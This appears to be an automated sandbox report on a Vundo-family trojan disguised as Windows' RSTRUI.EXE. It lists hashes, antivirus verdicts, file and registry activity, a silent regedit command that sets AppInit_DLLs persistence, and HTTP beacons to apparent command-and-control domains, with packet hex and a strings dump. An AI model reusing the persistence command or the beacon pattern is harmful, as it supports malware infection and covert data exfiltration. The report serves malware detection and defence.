Analysis Date | 2014-10-08 11:37:34 |
---|---|
MD5 | cfbdd820df44aa36a2575c0f22958b57 |
SHA1 | 0c16b6126fb75b1473f6af9447ec6622f4c78a28 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 13cc2cc8e384da536037e937ba7a07c7 sha1: 3b6f047661e98ebbaeda2e7379814973cbfc4313 size: 91136 | |
Section | _ASM2 md5: 1a932c7fa0a0eb8fb6d26f1f8905d189 sha1: 489594f1e9303a2903ffa00476b76b9a4766ce24 size: 63488 | |
Section | .rdata md5: 697c99e6dde9d3dcac304d26c87cc98b sha1: 00ef47a581e72f5f3047d4b8886ee2a33260ef4e size: 8192 | |
Section | .data md5: 6ae74fc20e4cf7b1e3a120e127950658 sha1: 195f91bc01ed5306654b41943751edba8e59b1c3 size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-26 05:01:05 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 4d1a23f74f3adcb3ccf36dd24ca511a862182928 | |
IMPhash | 26c8b4c4ce534a10cda2844fc8da413a | |
AV | 360 Safe | Gen:Variant.Spy.5 |
AV | Ad-Aware | Gen:Variant.Spy.5 |
AV | Alwil (avast) | Vundo-XK [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | CA (E-Trust Ino) | Win32/Vundo.N!generic |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.Mayachok.17986 |
AV | Emsisoft | Gen:Variant.Spy.5 |
AV | Eset (nod32) | Win32/Kryptik.AMHQ |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Spy.5 |
AV | Grisoft (avg) | Generic29.BSEH |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!CFBDD820DF44 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Spy.5 |
AV | Norman | winpe/Vundo.CRIM |
AV | Rising | no_virus |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Gen.2 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | TrojanDropper.Daws |
AV | Yara APT | no_virus |
AV | Zillya! | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\zzthrqe.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | vertilaza.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zzthrqe.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 141.8.225.80 |
DNS | fescheck.com Type: A 141.8.225.80 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | vertilaza.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | instrango.com Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | denadb.com Type: A |
DNS | foradns.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1 User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzSqKc8+o8Cd User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzWYJcslalVd User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V5tSrUWFiWIV User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1 User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V+ZSgibLVKLa User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 3356774e 37762f64 42553041 31204854 3VwN7v/dBU0A1 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206765 TP/1.1..Host: ge 0x000000e0 (00224) 74696e74 73752e63 6f6d0d0a 0d0a tintsu.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 33567a53 714b6338 2b6f3843 64204854 3VzSqKc8+o8Cd HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206765 TP/1.1..Host: ge 0x000000e0 (00224) 7461766f 6465732e 636f6d0d 0a0d0a tavodes.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 33567a57 594a6373 6c616c56 64204854 3VzWYJcslalVd HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a207472 TP/1.1..Host: tr 0x000000e0 (00224) 79617464 6e732e63 6f6d0d0a 0d0a0a yatdns.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 33563574 53725557 46695749 56204854 3V5tSrUWFiWIV HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206665 TP/1.1..Host: fe 0x000000e0 (00224) 73636865 636b2e63 6f6d0d0a 0d0a0a scheck.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 3356774e 37762f64 42553041 31204854 3VwN7v/dBU0A1 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20696e TP/1.1..Host: in 0x000000e0 (00224) 7a61766f 72612e63 6f6d0d0a 0d0a0a zavora.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 30382661 XX0000&key=108&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37353226 6f733d35 2e312e32 3630302e 752&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 7967386d 485a4653 42437134 59437934 yg8mHZFSBCq4YCy4 0x000000b0 (00176) 78664567 7358694d 4f5a2f4a 734e2f37 xfEgsXiMOZ/JsN/7 0x000000c0 (00192) 33562b5a 53676962 4c564b4c 61204854 3V+ZSgibLVKLa HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a203931 TP/1.1..Host: 91 0x000000e0 (00224) 2e323230 2e33352e 3135340d 0a0d0a .220.35.154....
Strings
P . .n I ' E . uriVurittcetorla \ .CC .z?..LM. .. .Y. . 041904B0 1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee 1Display debugger and debuggee version information 333f3 5.1.2600.5512 5.1.2600.5512 (xpsp.080413-2108) 7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information 8Configure mapping from file extension to source language About WinDbg Activate window Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows Close all source windows-Close all windows that are error placeholders"Open a new docked window container CompanyName CWindowClass Debug operations Detach the current program Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier Dock all undocked windows f3fff FileDescription FileVersion H ((((( H Halt the current program Help contents and searches h(((( H InternalName KERNEL32.DLL Kernel debugging control.Cycle through the available baud rate settings LegalCopyright Manage event filters Manage open windows :Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available Microsoft mscoree.dll Open a command browser window Open the command window Open the disassembly window Open the help index Open the help search dialog Open the help table of contents)Open the help for the current window type)Open help for the currently selected text "Open the process and thread window Open the registers window Open the scratch pad window"Open the process and thread window OriginalFilename ProductName ProductVersion Restart the Program"Stop debugging the current program RSTRUI.EXE Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running Step over the next statement Step out of the current function1Run the program to the line containing the cursor StringFileInfo Toggle the status bar on or off Toggle the status bar on or off,View or edit the font for the current window Toggle the toolbar on or off Trace into the next statement Translation Undock all docked windows VarFileInfo View program options View the module list View WinDbg's command line VS_VERSION_INFO Window arrangement and selection Windows @@@@?$@@@ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0eP,0 0rebgY 0SSSSS 0_tORKdr 0t Sd/`iebrQMe ni 1b pn; 1in1DW 2 ?(4pV< 24Yu~f $,2<Ba 2cdli1 2eesHB4dMMy 2eiyPU 2{v9a+ #)39>/syci 3es_eZ 3uoTY;9 43Peyh 4Cede+pssenOVC )59EmjYeiu </5?eF #<5L\86 5_VnP/ 60ve#; 6BMjtE 6-!;gc n 6htxDb -6IN*eln 6-noXG het 6stsH\ 6-uc:0t or} 72oslI 7'.MI@ 82|/1!8] 8;7780 8JkD`` 8k#L,s/ [8L(zS9 9@=h?K:1 !9n'0( @9P+?` 9u084P >&a2z@ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ^A:d3= @+AlcT ALrIdm.WnmtH An application has made an attempt to load the C runtime library incorrectly. aOcCv{eeler{r APAW.> `_ASM2 - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August A%*wXa a`Y7W &BBBBPvBBB BeginPaint BF@BRB BPh@X+B c2hcF_ @c33Yn6x c;4V@3 C;5Jg`j ca_rJP ce[)"I cgaLLQ )fo c;h$Py c.lFLFa CloseHandle CorExitProcess CreateSolidBrush CreateWindowExA - CRT not initialized cuMuE3 cxsyld>lSt _D d2<4GzS @.data DateTime:%04d.%02d:%d DDDDDC DDDDDDDDDD dddd, MMMM dd, yyyy DdR.Lr December DecodePointer DefWindowProcA DeleteCriticalSection DestroyWindow DeviceIoControl dignyeae= Dimwt DispatchMessageA DOMAIN error DottnQieF3 DPT`f{t DrawTextA dSihb;AeeF +, dy (D&ylxH e0ee0) .eagsN ed58hi2b50r6 eefiF_rai |(@eGX4 ehCyuia "Ejb3]EuuC9 ekrnEmon.dll eMN5i$ EncodePointer EndPaint enepWZeim EnterCriticalSection !etetl\Al eutyotpacr~eue ev]sS, ExitProcess f2Yon~@ @fa=]u ]Faxte }fdeie=~_NEo February FindResourceA FL4Q$7 - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue F_mr{eF fnMota @FPY? F9YP+[ FreeEnvironmentStringsA FreeEnvironmentStringsW Friday frvBTIV =fTr\ f u>op %Fxf+h G0ZkfNL -G4jX, gc-#~FK gc tF@ain gcucf+ GDI32.dll GetACP GetActiveWindow GetClientRect GetCommandLineA GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDeviceCaps GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetMessageA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemMetrics GetSystemTimeAsFileTime GetTickCount GetUserObjectInformationA GetVersion GetVersionExA g{gfMnb ]@GH@-5 ;GKWi|KW{ -gp\t$ h2$e e H6rteo hBRj:c HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize HH:mm:ss h>jEHS !hLoi<8: hPHql@ iAUTg`E ib,[AQ4:* 'I\;gkw Ih+3BC.Y4 '?iHle iKZ1+F InitializeCriticalSectionAndSpinCount InterlockedDecrement InterlockedIncrement IsDebuggerPresent IsValidCodePage /I!WJ> IwNDvG JanFebMarAprMayJunJulAugSepOctNovDec January JATFi[ J\eD]j2C j@j ^V JLFuVY jNEF~. JVZF52Z K4.1t0 kB vuM KCEi<tCoip KERNEL32.dll K@P\;o@FtYD KWI(|q K$X=*z>,g LCMapStringA LCMapStringW LeaveCriticalSection Ll>Sic LoadAcceleratorsA LoadCursorA LoadIconW LoadLibraryA LoadResource LoadStringA LockResource lstrcmpiA lt13Hl Lw7omY MD@@\` >mEEUB MessageBoxA ME@UE< Microsoft Visual C++ Runtime Library ~MidpNOii Mio#;laeH MM/dd/yy Monday mOtSTMA MultiByteToWideChar mx(HMw *neei% - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November n pt0D6-Ctfxz NW{G6N nWGn]@dGil (oaAnIR oAMQ]K October o]?eioeoxt OepaP=> oit.=n , okv O_}lAc oNun\Kt oPetvBLabt orTorA ot@@@@ O_VTO< p0*mnwu{forg P$:dMy PGt>Ps ) Pku+ Please contact the application's support team for more information. PPPPPPPP Program: <program name unknown> #PSa|K @Pu<i; - pure virtual function call }@@@@QK =<Qt>& QueryPerformanceCounter QW/I&J /raK' -r=B3D `.rdata r\e3rN Rectangle RegisterClassExA riabvt RJk6uA rPcrxX\. rsNrke RtlUnwind rtZVg.xg runtime error Runtime Error! ?rY]GT s>7adydv Saturday !_s=,D{/ September SetFilePointer SetHandleCount SetLastError SetParent SetUnhandledExceptionFilter ShowWindow si\iC'eR SING error SI- ;r[ sJk[0+/l strcat Sunday SunMonTueWedThuFriSat (sv)Vc ,t\.?$ tcr!>rrid TerminateProcess TextOutA This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday tiYtGoGo tJpclFN < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue tlWt= tmtVoqe T/?n\L T nMgd toarzk ;T|pVfg TranslateAcceleratorA TranslateMessage trntKMTIrm t"SS9] @t=tuD t$<"u 3 Tuesday ;t$,v- t+WWVPV !@ tz1t u-IN}t] u;Krna Un6uuPP - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter ))u o UotTLE uOu:XM UpdateWindow U p i= UQPXY]Y[ Uqxf+v0 URPQQh USER32.dll USER32.DLL u%UOk0 =uUYYHE v8DHTB VBNetStudio VirtualAlloc VirtualFree v N+D$ VRlP1pct VUkrb2 W>anq0 ^W,BU, W:D\qW Wednesday WideCharToMultiByte wI+lGq WriteFile wsprintfA @^_wst wtDDDDDDDC ,wV:Ph Q wwwws0 wwwwwwws wwwwwwww? wwwwwwwws wwwwwwwwww wwwwwwwwwwwww wwwwwwwwwwwwww wwwwwwwwwwwwwwz wwwwwwwwwwwwwz wwwwwwwwwwwwwzwwww wwwwwwwwzww wwwwwwwxx wwwwwwwz wwwwwwwzww ww y?J wXh_7~ XaPT5M xLW@t% X nuaO XSKf|` Y)/>_, *@*!YB y@FpY!mF ,yisS= yM}+ro >yNvS$ YS j4* >=Yt1j Yvr:q&W YyC3Vj@ Z90&MZK ZA,9PM $zaN|- zelSlTBM zFJV5t $z}jd- ZRichN= ZUWFZN z'W`gp